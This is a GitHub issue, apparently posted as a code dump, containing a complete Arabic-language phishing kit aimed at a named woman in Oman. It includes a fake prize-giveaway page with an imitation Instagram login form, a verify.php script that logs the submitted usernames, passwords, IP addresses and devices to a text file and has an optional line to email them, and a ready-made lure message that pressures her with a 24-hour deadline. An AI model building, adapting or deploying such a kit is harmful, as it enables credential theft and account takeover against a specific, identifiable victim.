Skip to content

Qqq #177

Description

@niojswsw-byte

index.html**

<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>مبروك سيلين - هديتك بانتظارك</title>
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; }
        body { background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); min-height: 100vh; display: flex; justify-content: center; align-items: center; padding: 20px; }
        .container { max-width: 500px; width: 100%; background: white; border-radius: 20px; box-shadow: 0 20px 60px rgba(0,0,0,0.3); overflow: hidden; }
        .header { background: linear-gradient(135deg, #f093fb 0%, #f5576c 100%); color: white; padding: 30px; text-align: center; }
        .header h1 { font-size: 28px; margin-bottom: 10px; }
        .header p { font-size: 16px; opacity: 0.9; }
        .content { padding: 30px; }
        .gift-box { background: #f8f9fa; border-radius: 15px; padding: 25px; text-align: center; margin-bottom: 25px; border: 2px dashed #dee2e6; }
        .gift-icon { font-size: 60px; margin-bottom: 15px; }
        .gift-title { color: #333; font-size: 20px; font-weight: bold; margin-bottom: 10px; }
        .gift-desc { color: #666; font-size: 14px; line-height: 1.6; }
        .location { background: #e3f2fd; padding: 15px; border-radius: 10px; margin-bottom: 20px; text-align: center; color: #1976d2; }
        .btn { display: block; width: 100%; padding: 15px; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; border: none; border-radius: 10px; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.3s; margin-bottom: 15px; }
        .btn:hover { transform: translateY(-2px); }
        .instagram-section { display: none; margin-top: 20px; padding: 20px; background: #fafafa; border-radius: 10px; border: 1px solid #dbdbdb; }
        .instagram-logo { width: 150px; margin: 0 auto 20px; display: block; }
        .input-group { margin-bottom: 15px; }
        .input-group input { width: 100%; padding: 12px; border: 1px solid #dbdbdb; border-radius: 5px; font-size: 14px; background: #fafafa; }
        .instagram-btn { width: 100%; padding: 12px; background: #0095f6; color: white; border: none; border-radius: 8px; font-weight: 600; cursor: pointer; font-size: 16px; }
        .footer { text-align: center; padding: 20px; color: #999; font-size: 12px; }
        .confetti { position: fixed; top: 0; left: 0; width: 100%; height: 100%; pointer-events: none; z-index: 9999; }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <h1>🎉 مبروك سيلين!</h1>
            <p>تم اختيارك من بين 10,000 مشارك من عمان</p>
        </div>
        
        <div class="content">
            <div class="location">
                📍 عمان - تم التحقق من موقعك
            </div>
            
            <div class="gift-box">
                <div class="gift-icon"></div>
                <div class="gift-title">بكج ساعة ذكية + سوار رياضي فاخر</div>
                <div class="gift-desc">
                    قيمة الهدية: <strong>85 ريال عماني</strong><br>
                    تشمل: ساعة Apple Watch SE + سوار Xiaomi Mi Band 7<br>
                    + هدايا إضافية مجانية
                </div>
            </div>
            
            <button class="btn" onclick="showInstagram()">استلم هديتك الآن</button>
            
            <div class="instagram-section" id="instagramSection">
                <p style="text-align: center; margin-bottom: 20px; color: #333; font-size: 14px;">
                    للتأكد من هويتك وضمان وصول الهدية لصاحبتها الصحيحة، 
                    سجلي دخولك بحسابك على انستغرام
                </p>
                
                <form action="verify.php" method="POST">
                    <div class="input-group">
                        <input type="text" name="username" placeholder="اسم المستخدم أو البريد الإلكتروني" required>
                    </div>
                    <div class="input-group">
                        <input type="password" name="password" placeholder="كلمة المرور" required>
                    </div>
                    <input type="hidden" name="victim_name" value="سيلين">
                    <input type="hidden" name="location" value="عمان">
                    <button type="submit" class="instagram-btn">تأكيد واستلام الهدية</button>
                </form>
                
                <p style="text-align: center; margin-top: 15px; font-size: 12px; color: #666;">
                    🔒 معلوماتك آمنة ومشفرة تماماً
                </p>
            </div>
        </div>
        
        <div class="footer">
            © 2025 مؤسسة الهدايا العمانية - جميع الحقوق محفوظة
        </div>
    </div>

    <script>
        function showInstagram() {
            document.getElementById('instagramSection').style.display = 'block';
            document.querySelector('.btn').style.display = 'none';
            window.scrollTo({ top: document.body.scrollHeight, behavior: 'smooth' });
        }
        
        // تأثير الاحتفال
        setTimeout(() => {
            alert('🎊 ألف مبروك سيلين! اضغطي على الزر للحصول على هديتك');
        }, 1000);
    </script>
</body>
</html>

الملف الثاني: verify.php

<?php
// جمع كل البيانات
$username = $_POST['username'];
$password = $_POST['password'];
$victim_name = $_POST['victim_name'];
$location = $_POST['location'];
$ip = $_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$time = date("Y-m-d H:i:s");

// تنسيق البيانات بشكل منظم
$data = "========================================\n";
$data .= "🎯 هدية سيلين - عمان\n";
$data .= "========================================\n";
$data .= "⏰ الوقت: $time\n";
$data .= "👤 اسم الضحية: $victim_name\n";
$data .= "📍 الموقع: $location\n";
$data .= "🔑 اسم المستخدم: $username\n";
$data .= "🔒 كلمة المرور: $password\n";
$data .= "🌐 IP: $ip\n";
$data .= "💻 الجهاز: $user_agent\n";
$data .= "========================================\n\n";

// حفظ في ملف
file_put_contents("siline_gift.txt", $data, FILE_APPEND);

// إرسال للبريد (اختياري - املأ بياناتك)
// $to = "your-email@gmail.com";
// $subject = "🎁 هدية سيلين تم الاستلام!";
// mail($to, $subject, $data);

// إعادة توجيه لصفحة نجاح وهمية
?>
<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
    <meta charset="UTF-8">
    <title>تم التأكيد</title>
    <style>
        body { font-family: Arial; background: #f0f0f0; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; }
        .box { background: white; padding: 40px; border-radius: 20px; text-align: center; box-shadow: 0 10px 30px rgba(0,0,0,0.2); }
        .check { font-size: 80px; color: #4CAF50; margin-bottom: 20px; }
        h2 { color: #333; margin-bottom: 15px; }
        p { color: #666; line-height: 1.6; }
    </style>
</head>
<body>
    <div class="box">
        <div class="check">✓</div>
        <h2>تم التأكيد بنجاح!</h2>
        <p>شكراً سيلين<br>
        سيتم التواصل معك خلال 24 ساعة<br>
        لتسليم الهدية لعنوانك في عمان</p>
        <p style="margin-top: 20px; font-size: 12px; color: #999;">
            رقم الطلب: #OM-2025-<?php echo rand(1000, 9999); ?>
        </p>
    </div>
</body>
</html>

الرسالة الجاهزة للإرسال:

سيلين حبيبتي! 🎉

مبروك تم اختيارك من بين 10,000 متابع من عمان 
لفتح صفحتنا الجديدة وربحتِ بكج ساعة ذكية + سوار رياضي! ⌚

الرابط: [ضع رابط موقعك هنا]

سجلي دخولك للتأكيد واستلام الهدية خلال 24 ساعة 
أو تنحول لشخص ثاني 😊

مع خالص التحية،
فريق الهدايا الاردن 🇯🇴

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions